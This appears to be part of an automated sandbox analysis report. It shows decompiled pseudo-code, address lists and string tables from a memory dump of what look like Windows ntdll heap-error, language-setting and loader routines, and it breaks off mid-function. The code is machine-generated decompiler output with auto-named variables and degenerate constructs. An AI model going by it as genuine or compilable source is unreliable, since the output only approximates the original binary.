                                                            • The instruction at %p tried to %s , xrefs: 0496B4B6
                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0496B53F
                                                            • The resource is owned shared by %d threads, xrefs: 0496B37E
                                                            • write to, xrefs: 0496B4A6
                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 0496B48F
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                            • API String ID: 0-108210295
                                                            • Opcode ID: 4384afc0d72535f287a4b2bb97d748d9145a5afb0705dad16e0da877c17837c3
                                                            • Instruction ID: fc226a237095f3710009cfabe0b924d65923c2ddb1f332bd4b13a22d12519c36
                                                            • Opcode Fuzzy Hash: 4384afc0d72535f287a4b2bb97d748d9145a5afb0705dad16e0da877c17837c3
                                                            • Instruction Fuzzy Hash: 31814431B41220FFEB216A44CC45D7B3B6BAFC6765F410574FA05EB611F2A4B422DA72
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04971C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 44%
                                                            			E04971C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x48948a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E048BB150();
				} else {
					E048BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x49a589c);
				E048BB150("Heap error detected at %p (heap handle %p)\n",  *0x49a58a0);
				_t27 =  *0x49a5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04971E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E048BB150();
				} else {
					E048BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E048BB150("Error code: %d - %s\n",  *0x49a5898);
				_t113 =  *0x49a58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E048BB150();
					} else {
						E048BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E048BB150("Parameter1: %p\n",  *0x49a58a4);
				}
				_t115 =  *0x49a58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E048BB150();
					} else {
						E048BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E048BB150("Parameter2: %p\n",  *0x49a58a8);
				}
				_t117 =  *0x49a58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E048BB150();
					} else {
						E048BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E048BB150("Parameter3: %p\n",  *0x49a58ac);
				}
				_t119 =  *0x49a58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E048BB150();
					} else {
						E048BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x49a58b4);
					E048BB150("Last known valid blocks: before - %p, after - %p\n",  *0x49a58b0);
				} else {
					_t120 =  *0x49a58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E048BB150();
				} else {
					E048BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E048BB150("Stack trace available at %p\n", 0x49a58c0);
			}











                                                            0x04971c10
                                                            0x04971c16
                                                            0x04971c1e
                                                            0x04971c3d
                                                            0x04971c3e
                                                            0x04971c20
                                                            0x04971c35
                                                            0x04971c3a
                                                            0x04971c44
                                                            0x04971c55
                                                            0x04971c5a
                                                            0x04971c65
                                                            0x04971c67
                                                            0x00000000
                                                            0x04971c6e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04971c67
                                                            0x04971cdc
                                                            0x04971ce5
                                                            0x04971d04
                                                            0x04971d05
                                                            0x04971ce7
                                                            0x04971cfc
                                                            0x04971d01
                                                            0x04971d0b
                                                            0x04971d17
                                                            0x04971d1f
                                                            0x04971d25
                                                            0x04971d30
                                                            0x04971d4f
                                                            0x04971d50
                                                            0x04971d32
                                                            0x04971d47
                                                            0x04971d4c
                                                            0x04971d61
                                                            0x04971d67
                                                            0x04971d68
                                                            0x04971d6e
                                                            0x04971d79
                                                            0x04971d98
                                                            0x04971d99
                                                            0x04971d7b
                                                            0x04971d90
                                                            0x04971d95
                                                            0x04971daa
                                                            0x04971db0
                                                            0x04971db1
                                                            0x04971db7
                                                            0x04971dc2
                                                            0x04971de1
                                                            0x04971de2
                                                            0x04971dc4
                                                            0x04971dd9
                                                            0x04971dde
                                                            0x04971df3
                                                            0x04971df9
                                                            0x04971dfa
                                                            0x04971e00
                                                            0x04971e0a
                                                            0x04971e13
                                                            0x04971e32
                                                            0x04971e33
                                                            0x04971e15
                                                            0x04971e2a
                                                            0x04971e2f
                                                            0x04971e39
                                                            0x04971e4a
                                                            0x04971e02
                                                            0x04971e02
                                                            0x04971e08
                                                            0x00000000
                                                            0x00000000
                                                            0x04971e08
                                                            0x04971e5b
                                                            0x04971e7a
                                                            0x04971e7b
                                                            0x04971e5d
                                                            0x04971e72
                                                            0x04971e77
                                                            0x04971e95

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                            • API String ID: 0-2897834094
                                                            • Opcode ID: 9c23e3a67f099a50019cdbf4e8142c2f54581670dee79ceb154c4a71ce4ca446
                                                            • Instruction ID: a756e6e1a0daced0f327d7c8d5a363807df73fcdaaa912cdea75162c1266acf8
                                                            • Opcode Fuzzy Hash: 9c23e3a67f099a50019cdbf4e8142c2f54581670dee79ceb154c4a71ce4ca446
                                                            • Instruction Fuzzy Hash: 7461E832A55544DFF6119B88D486E3477E9EB04A3070E8D3AF549DB701E6A8BC60CF8B
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048C3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 96%
                                                            			E048C3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E048C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E048C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E048C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E048C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E048C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L048D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E048FF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04901370(_t276, 0x4894e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E048FBB40(0,  &_v68, _t170);
									if(L048C43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E048FBB40(_t257,  &_v68, _t243);
								if(L048C43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04901370(_t278, 0x4894e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L048D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E048FF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04901370(_v16, 0x4894e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E048FBB40(_t262,  &_v68, _t244);
								if(L048C43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04901370(_t282, 0x4894e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E048FBB40(_t262,  &_v68, _t201);
							if(L048C43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L048D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E048FF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04901370(_t280, 0x4894e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E048FBB40(_t267,  &_v68, _t245);
							if(L048C43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04901370(_t284, 0x4894e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E048FBB40(_t267,  &_v68, _t224);
						if(L048C43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                            0x048c3d3c
                                                            0x048c3d42
                                                            0x048c3d44
                                                            0x048c3d46
                                                            0x048c3d49
                                                            0x048c3d4c
                                                            0x048c3d4f
                                                            0x048c3d52
                                                            0x048c3d55
                                                            0x048c3d58
                                                            0x048c3d5b
                                                            0x048c3d5f
                                                            0x048c3d61
                                                            0x048c3d66
                                                            0x04918213
                                                            0x04918218
                                                            0x048c4085
                                                            0x048c4088
                                                            0x048c408e
                                                            0x048c4094
                                                            0x048c409a
                                                            0x048c40a0
                                                            0x048c40a6
                                                            0x048c40a9
                                                            0x048c40af
                                                            0x048c40b6
                                                            0x048c40bd
                                                            0x048c40bd
                                                            0x048c3d83
                                                            0x0491821f
                                                            0x04918229
                                                            0x04918238
                                                            0x04918238
                                                            0x0491823d
                                                            0x0491823d
                                                            0x048c3da0
                                                            0x048c3daf
                                                            0x048c3db5
                                                            0x048c3dba
                                                            0x048c3dba
                                                            0x048c3dd4
                                                            0x048c3e94
                                                            0x048c3eab
                                                            0x048c3f6d
                                                            0x048c3f84
                                                            0x048c406b
                                                            0x048c406b
                                                            0x048c406e
                                                            0x048c406e
                                                            0x048c4070
                                                            0x048c4074
                                                            0x04918351
                                                            0x04918351
                                                            0x048c407a
                                                            0x048c407f
                                                            0x0491835d
                                                            0x04918370
                                                            0x04918377
                                                            0x04918379
                                                            0x0491837c
                                                            0x0491837c
                                                            0x0491835d
                                                            0x00000000
                                                            0x048c407f
                                                            0x048c3f8a
                                                            0x048c3f8d
                                                            0x048c3f90
                                                            0x048c3f95
                                                            0x0491830d
                                                            0x0491830f
                                                            0x048c3f9b
                                                            0x048c3fac
                                                            0x048c3fae
                                                            0x048c3fb1
                                                            0x048c3fb1
                                                            0x048c3fb6
                                                            0x04918317
                                                            0x0491831a
                                                            0x00000000
                                                            0x048c3fbc
                                                            0x048c3fc1
                                                            0x048c3fc9
                                                            0x048c3fd7
                                                            0x048c3fda
                                                            0x048c3fdd
                                                            0x048c4021
                                                            0x048c4021
                                                            0x048c4029
                                                            0x048c4030
                                                            0x048c4044
                                                            0x048c4046
                                                            0x048c4046
                                                            0x048c4044
                                                            0x048c4049
                                                            0x04918327
                                                            0x04918334
                                                            0x04918339
                                                            0x0491833c
                                                            0x048c404f
                                                            0x048c404f
                                                            0x048c404f
                                                            0x048c4051
                                                            0x048c4056
                                                            0x048c4063
                                                            0x048c4063
                                                            0x048c4068
                                                            0x00000000
                                                            0x048c4068
                                                            0x048c3fdf
                                                            0x048c3fe2
                                                            0x048c3fe4
                                                            0x048c3fe7
                                                            0x048c3fef
                                                            0x048c4003
                                                            0x048c4005
                                                            0x048c4005
                                                            0x048c400c
                                                            0x048c4013
                                                            0x048c4016
                                                            0x048c4017
                                                            0x048c401b
                                                            0x048c401e
                                                            0x00000000
                                                            0x048c401e
                                                            0x048c3fb6
                                                            0x048c3eb1
                                                            0x048c3eb4
                                                            0x048c3eb7
                                                            0x048c3ebc
                                                            0x049182a9
                                                            0x049182ab
                                                            0x048c3ec2
                                                            0x048c3ed3
                                                            0x048c3ed5
                                                            0x048c3ed8
                                                            0x048c3ed8
                                                            0x048c3edd
                                                            0x049182b3
                                                            0x049182b6
                                                            0x00000000
                                                            0x048c3ee3
                                                            0x048c3ee8
                                                            0x048c3eed
                                                            0x048c3ef0
                                                            0x048c3ef3
                                                            0x048c3f02
                                                            0x048c3f05
                                                            0x048c3f08
                                                            0x049182c0
                                                            0x049182c3
                                                            0x049182c5
                                                            0x049182c8
                                                            0x049182d0
                                                            0x049182e4
                                                            0x049182e6
                                                            0x049182e6
                                                            0x049182ed
                                                            0x049182f4
                                                            0x049182f7
                                                            0x049182f8
                                                            0x049182fc
                                                            0x049182ff
                                                            0x049182ff
                                                            0x048c3f0e
                                                            0x048c3f11
                                                            0x048c3f16
                                                            0x048c3f1d
                                                            0x048c3f31
                                                            0x04918307
                                                            0x04918307
                                                            0x048c3f31
                                                            0x048c3f39
                                                            0x048c3f48
                                                            0x048c3f4d
                                                            0x048c3f50
                                                            0x048c3f50
                                                            0x048c3f53
                                                            0x048c3f58
                                                            0x048c3f65
                                                            0x048c3f65
                                                            0x048c3f6a
                                                            0x00000000
                                                            0x048c3f6a
                                                            0x048c3edd
                                                            0x048c3dda
                                                            0x048c3ddd
                                                            0x048c3de0
                                                            0x048c3de5
                                                            0x04918245
                                                            0x048c3deb
                                                            0x048c3df7
                                                            0x048c3dfc
                                                            0x048c3dfe
                                                            0x048c3e01
                                                            0x048c3e01
                                                            0x048c3e06
                                                            0x0491824d
                                                            0x0491824f
                                                            0x04918254
                                                            0x00000000
                                                            0x048c3e0c
                                                            0x048c3e11
                                                            0x048c3e16
                                                            0x048c3e19
                                                            0x048c3e29
                                                            0x048c3e2c
                                                            0x048c3e2f
                                                            0x0491825c
                                                            0x0491825f
                                                            0x04918261
                                                            0x04918264
                                                            0x0491826c
                                                            0x04918280
                                                            0x04918282
                                                            0x04918282
                                                            0x04918289
                                                            0x04918290
                                                            0x04918293
                                                            0x04918294
                                                            0x04918298
                                                            0x0491829b
                                                            0x0491829b
                                                            0x048c3e35
                                                            0x048c3e38
                                                            0x048c3e3d
                                                            0x048c3e44
                                                            0x048c3e58
                                                            0x049182a3
                                                            0x049182a3
                                                            0x048c3e58
                                                            0x048c3e60
                                                            0x048c3e6f
                                                            0x048c3e74
                                                            0x048c3e77
                                                            0x048c3e77
                                                            0x048c3e7a
                                                            0x048c3e7f
                                                            0x048c3e8c
                                                            0x048c3e8c
                                                            0x048c3e91
                                                            0x00000000
                                                            0x048c3e91

                                                            Strings
                                                            • Kernel-MUI-Language-SKU, xrefs: 048C3F70
                                                            • WindowsExcludedProcs, xrefs: 048C3D6F
                                                            • Kernel-MUI-Language-Disallowed, xrefs: 048C3E97
                                                            • Kernel-MUI-Language-Allowed, xrefs: 048C3DC0
                                                            • Kernel-MUI-Number-Allowed, xrefs: 048C3D8C
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                            • API String ID: 0-258546922
                                                            • Opcode ID: 382bb36e87e8db83dc0547c3be868403813b53a1b3bb10419351c633ab14bf9d
                                                            • Instruction ID: 46f9a19a887a3d0cce7a8cd4d0e2798d8bfec34c0fdef07b3aeee376421ad4ea
                                                            • Opcode Fuzzy Hash: 382bb36e87e8db83dc0547c3be868403813b53a1b3bb10419351c633ab14bf9d
                                                            • Instruction Fuzzy Hash: 30F16F71D00618EFDB11DF98C9809EEB7B9FF48B54F144A6AE905E7210E774AE01CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048C8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 83%
                                                            			E048C8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E048C934A() != 0) {
								_t159 = E0493A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x49a5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04935510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x49a5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E048C849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E048C8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E048C8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x49a5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x49a5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E048D2280(_t92, 0x49a86cc);
															_t94 = E04989DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E048E61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x49a5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
